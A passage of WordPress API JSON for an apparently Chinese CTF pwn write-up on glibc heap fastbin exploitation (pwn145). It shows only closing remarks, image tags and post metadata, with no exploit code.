src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-787\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u7e335de2\">\u53ef\u4ee5\u770b\u5230\u91cc\u9762\u7684\u5185\u5bb9\u4e5f\u662f\u88ab\u8986\u76d6\u4e86<\/p>\n\n\n\n<p id=\"uec9839a3\">ok,\u62ff\u4e2aflag<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-63-1024x946.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"946\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-63-1024x946.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-788\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u597d\u4e86\uff0cfastbin\u5c31\u5230\u8fd9\u513f\uff0c\u8981\u8003\u6982\u7387\u8bba\u4e86TAT<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>1\u3001pwn145 \u6ca1\u94b1\u4e86\u5b69\u5b50\u4eec\uff0c\u53ea\u80fd\u672c\u5730\u73a9\u73a9\u4e86 \u7ee7\u7eed\u5b66\u4e60\u5806\uff0c\u8fd9\u9053\u9898\u7684\u63d0\u793a\u662f\uff1aglibc\u7684\u4e00\u79cd\u5206\u914d\u89c4\u5219 \u9996\u5148\u67e5\u67e5 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":791,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[4,6],"class_list":["post-737","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-learn","tag-pwn","tag-6"],"_links":{"self":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/737","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/comments?post=737"}],"version-history":[{"count":1,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/737\/revisions"}],"predecessor-version":[{"id":789,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/737\/revisions\/789"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/media\/791"}],"wp:attachment":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/media?parent=737"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/categories?post=737"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/tags?post=737"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}